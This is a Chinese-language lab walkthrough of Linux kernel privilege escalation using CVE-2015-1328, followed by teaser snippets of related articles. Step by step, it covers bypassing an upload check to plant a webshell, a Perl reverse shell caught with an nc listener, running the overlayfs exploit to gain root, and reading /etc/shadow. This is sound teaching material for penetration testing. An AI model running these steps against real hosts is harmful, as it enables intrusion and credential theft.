linux内核漏洞提权(以cve-2015-1328为例)(代码片段)

Ocean:) Ocean:)     2023-02-04     163

关键词:

Linux内核漏洞提权

一般webshell拿到的权限都是web容器权限,如iis就是iss用户组权限,apache就是apache 权限,可以执行普通命令,但是如果要进行内网渗透就需要拿到系统权限或者超级管理员权限

linux提权首先需要创建交互shell

靶机环境Ubuntu15.04

保证主机与靶机之间可以连通

拿shell

利用已有的web漏洞,如文件上传,命令执行等上传一句话木马,得到交互式shell

假如web界面存在文件上传

测试之后发现,修改文件头可以绕过上传检测

成功上传一句话文件,并且拿到了存放位置

使用蚁剑连接就可以

打开终端,使用命令查看用户为 www-data 权限

可以使用工具 perl-reverse-shell.pl 建立 sockets 连接方便之后的操作

首先把这个脚本通过蚁剑上传至服务器,修改反弹shell的IP和端口

使用命令增加执行权限

chmod +x perl-reverse-shell.pl 

使用ls -al命令发现脚本具有了执行权限

本机使用nc监听相应端口

nc -lvvp 1234

然后再蚁剑执行反弹shell脚本,成功接收到shell

这样的话就拿到shell,就可以愉快的进行接下来的提权了(这步不喜欢可以省略)

提权

在拿到一个低权限用户后,对系统的信息进行收集,找到可以利用的漏洞点

信息收集

基本步骤

  1. 检测操作系统的发行版本
  2. 查看内核版本
  3. 检测当前用户权限
  4. 列举Suid文件
  5. 查看已经安装的包,程序,运行的服务,过期的版本可能有漏洞
  • 查看发行版

    cat /etc/issue
    cat /etc/*release
    

  • 查看内核版本

    uname -a
    #查看内核版本
    lsb_release –a
    #当前系统发行版的具体版本号
    

拿到这些信息之后可以去exploit db根据内核版本查找可用提权方法

https://www.exploit-db.com/

查看第二个利用方法,https://www.exploit-db.com/exploits/37292,点进去可以看到漏洞利用详情

CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

也可以使用kali自带本地版本的Exploit-DB库,其中包含了各种exp和代码(和网页上搜的是一样的)

使用SearchSploit来访问这个exp库
#searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23 | exploits/linux_x86/local/42276.c
复制exp位置,locate查找完整的路径
# locate linux/local/8572.c
/usr/share/exploitdb/exploits/linux/local/8572.c
查看该文件,查看关于exp的详细信息

详细信息中有利用方式和漏洞exp,这个利用方法较简单,只需要上传文件,gcc编译exp,然后运行即可

复制exploit给出的 exp,新建文件ofs.c,粘贴复制的exp,使用蚁剑上传至靶场中,执行以下命令

$ gcc ofs.c -o ofs
$ chmod 777 ofs
$ ./ofs

可以发现成功提权为root用户

切换shell

反弹的shell,使用起来不太方便,可以用python,切换至正常的shell

python -c 'import pty;pty.spawn("/bin/bash")'

拥有root用户就可以查看更多文件

比如查询密文文件

cat /etc/shadow

提权原理可以看这篇文章:https://xz.aliyun.com/t/2054

附件

题目中用到的工具和脚本

「perl-reverse-shell.pl」等文件,点击链接保存,或者复制本段内容,打开「阿里云盘」APP ,无需下载,极速在线查看享用。 链接:https://www.aliyundrive.com/s/ZDAwUAsyghD

cve-2022-0847linux内核提权漏洞分析(代码片段)

...e系统调用2.3漏洞利用流程总结前言2022年2月23日,Linux内核发布漏洞补丁,修复了内核5.8及之后版本存在的任意文件覆盖的漏洞(CVE-2022-0847),该漏洞可导致普通用户本地提权至root特权,因为 查看详情

cve-2022-0847linux内核提权漏洞分析(代码片段)

...e系统调用2.3漏洞利用流程总结前言2022年2月23日,Linux内核发布漏洞补丁,修复了内核5.8及之后版本存在的任意文件覆盖的漏洞(CVE-2022-0847),该漏洞可导致普通用户本地提权至root特权,因为 查看详情

操作系统权限提升(十八)之linux提权-内核提权(代码片段)

Linux内核提权Linux内核提权原理内核提权是利用Linux内核的漏洞进行提权的,内核漏洞进行提权一般包括三个环节:1、对目标系统进行信息收集,获取到系统内核信息及版本信息;2、根据内核版本获取其对应的漏... 查看详情

权限提升和维持(代码片段)

HVV笔记——权限提升和维持1Linux权限提升1.1内核提权1.1.1内核与发行版1.1.2内核漏洞1.1.3漏洞利用1.2SUDO提权1.2.1提权原理1.2.2命令的权限1.2.3权限提升1.2.4提升复现1.2.5堆缓冲区溢出漏洞1.3SUID提权1.3.1SUID权限1.3.2SUID提权原理1.3.3查找S... 查看详情

什么是电脑内核提权漏洞?

...以将本地低权限的用户提高成"至高无上"的统治者内核态的程序拥有一切权限,在WINDOWS操作系统上,没有任何其他软件可以限制内核态程序的行为,因此一旦内核提权漏洞被触发,攻击者就可以操纵系统一切可以操纵的... 查看详情

linux提权宝典(代码片段)

...思路是通过信息搜集查找可利用的文件/脚本/软件/用户/内核漏洞/恶意劫持/特定平台漏洞/框架漏洞/组件/等,写入或执行恶意命令/脚本/shell/添加高权限用户,提权成功,然后进一步利用。二、信息收集uname-a命令看完... 查看详情

相互帮助:微软在linux中发现了两个提权漏洞

...Microsoft365Defender研究团队在 Linux 操作系统中发现了两个漏洞,分别被跟踪为CVE-2022-29799和CVE-2022-29800(统称为Nimbuspwn),可允许攻击者提升权限以获取root权限并安装恶意软件。Microsoft365Defender研究团队在Linux操作... 查看详情

windows提权第一篇-内核溢出漏洞提权(代码片段)

...为什么需要提权Windows提权的常见方法Windows系统常见命令内核溢出漏洞提权IIS权限拿shell提权过程信息收集提权apsx提权为什么需要提权读取/写入敏感文件重新启动之后权限维持插入永久后门Windows提权的常见方法1.内核漏洞2.错误... 查看详情

linux提权漏洞总结

https://github.com/SecWiki/linux-kernel-exploits https://www.sec-wiki.com/skill 查看详情

sudo提权漏洞复现

...改配置文件/etc/sudoers,将sudo使用权赋予该用户 而这个漏洞使得普通用户也可以绕过安全策略,执行敏感命令漏洞影响的版本是<1.8.28 实验环境:kali 漏洞复现过程 1、 查看sudo版本 Sudo 查看详情

android内核层驱动程序uaf漏洞提权实例(代码片段)

文章目录前言UAF漏洞babydriver环境搭建漏洞分析提权expcred结构fork()函数总结前言自2021年11月从国企离职并入职互联网私企后,发现博客很少更新了……自然不是因为开始躺平了(菜鸡的学习之路还很漫长…),而... 查看详情

内网提权-系统篇

...rity-updates/https://portal.msrc.microsoft.com/en-us/security-guidancelinux内核提权脏牛漏洞内核版本>2.6https://github.com/SecWiki/linux-kernel-exploits 查看详情

内网渗透之提权(代码片段)

...Linux系统的反弹shell命令的一些收集对于Windows系统的提权内核溢出漏洞提权方法一:手动执行命令方法二:msf后渗透模块 方法三:WindowsExploitSuggester方法四:PowerShell中的Sherlock脚本Windows错误配置提权系统服务权限... 查看详情

“微软冲着linux大喊:快看,你这也有提权漏洞!”(代码片段)

...f0c;前几天微软就揭露了几个会影响许多Linux发行版的提权漏洞 查看详情

内网渗透系列:权限提升方法小结(代码片段)

目录前言一、Windows1、BypassUAC(1)常用方法(2)常用工具2、提权(1)windows内核漏洞提权(2)服务提权(3)配置错误(4)其他(5)提权脚本二、Linux1、内核溢出提权2、计 查看详情

内网渗透系列:权限提升方法小结(代码片段)

目录前言一、Windows1、BypassUAC(1)常用方法(2)常用工具2、提权(1)windows内核漏洞提权(2)服务提权(3)配置错误(4)其他(5)提权脚本二、Linux1、内核溢出提权2、计 查看详情

(cve-2019-14287)sudo提权漏洞

(CVE-2019-14287)sudo提权漏洞一、漏洞简介sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,漏洞主要原因因为将用户ID转换为用户名的函数,会将-1(或无效等效的4294967295)误认为0... 查看详情

内网渗透测试理论学习之第三篇内网渗透权限提升(代码片段)

文章目录一、内核溢出漏洞二、系统配置错误1、系统服务权限配置错误2、注册表键AlwaysInstallElevated3、可信任服务路径漏洞(TrustedServicePaths)4、自动安装配置文件5、计划任务三、组策略首选项提权漏洞四、绕过UAC提权... 查看详情